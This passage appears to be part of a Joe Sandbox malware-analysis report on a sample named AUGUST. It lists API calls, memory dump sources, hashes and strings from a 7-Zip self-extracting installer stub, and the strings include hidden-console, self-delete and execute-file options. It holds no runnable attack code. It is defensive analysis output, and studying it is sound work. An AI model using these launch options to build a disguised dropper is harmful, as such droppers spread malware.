                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                          • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                          • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA

                                          Control-flow Graph: function at 00401626

                                          Control-flow Graph: function at 0040301A
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                          • SetLastError.KERNEL32(00000010), ref: 0040303D
                                          Similarity
                                          • API ID: AttributesErrorFileLast
                                          APIs
                                          • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                          • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                          Similarity
                                          • API ID: DiskFreeMessageSendSpace

                                          Control-flow Graph: function at 00411DEF
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID: HpA
                                          • API String ID: 801014965-2938899866
                                          • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                          • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                          • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                          • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                          • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                          • DispatchMessageW.USER32(?), ref: 00401B89
                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                          • String ID: Static
                                          • API String ID: 2479445380-2272013587
                                          • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                          • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                          • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                          • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                          Control-flow Graph

                                          APIs
                                          • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                          • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@memcpymemmove
                                          • String ID:
                                          • API String ID: 3549172513-3916222277
                                          • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                          • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                          • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                          • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                          Control-flow Graph

                                          APIs
                                          • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                          • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                          • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 846840743-0
                                          • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                          • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                          • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                          • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                            • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                            • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                          • wsprintfW.USER32 ref: 004044A7
                                            • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                          • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                          • String ID: 7zSfxFolder%02d$IA
                                          • API String ID: 3387708999-1317665167
                                          • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                          • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                          • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                          • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                          Control-flow Graph

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                          • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID: IA$IA
                                          • API String ID: 1033339047-1400641299
                                          • Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                          • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                          • Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
                                          • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: free
                                          • String ID: $KA$4KA$HKA$\KA
                                          • API String ID: 1294909896-3316857779
                                          • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                          • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                          • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                          • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                          Control-flow Graph

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 004096D0
                                          • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                          • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                            • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@$H_prolog
                                          • String ID: HIA
                                          • API String ID: 3431946709-2712174624
                                          • Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                          • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                          • Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                          • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                          Control-flow Graph

                                          [Figure: control-flow graph 1236, starting at block 402844-40288e; legend: Executed / Not Executed]
                                          APIs
                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                          • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                          • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                          • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcmp$memmove
                                          • String ID:
                                          • API String ID: 3251180759-0
                                          • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                          • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                          • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                          • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                          Control-flow Graph

                                          [Figure: control-flow graph 1263, starting at block 40150b-401561; legend: Executed / Not Executed]
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                          • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                            • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                            • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                            • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                            • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                            • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                            • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                            • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                            • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                          • String ID:
                                          • API String ID: 359084233-0
                                          • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                          • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                          • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                          • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                          Control-flow Graph

                                          [Figure: control-flow graph 1300, starting at block 401986-401995; legend: Executed / Not Executed]
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                          • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                          • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 635176117-0
                                          • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                          • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                          • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                          • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                          Control-flow Graph

                                          [Figure: control-flow graph 1308, starting at block 404a44-404a62; legend: Executed / Not Executed]
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000010,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                          • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID: ExecuteFile
                                          • API String ID: 1033339047-323923146
                                          • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                          • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                          • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                          • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                          Control-flow Graph

                                          [Figure: control-flow graph 1343, starting at block 40adc3-40adce; legend: Executed / Not Executed]
                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                          • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmp
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
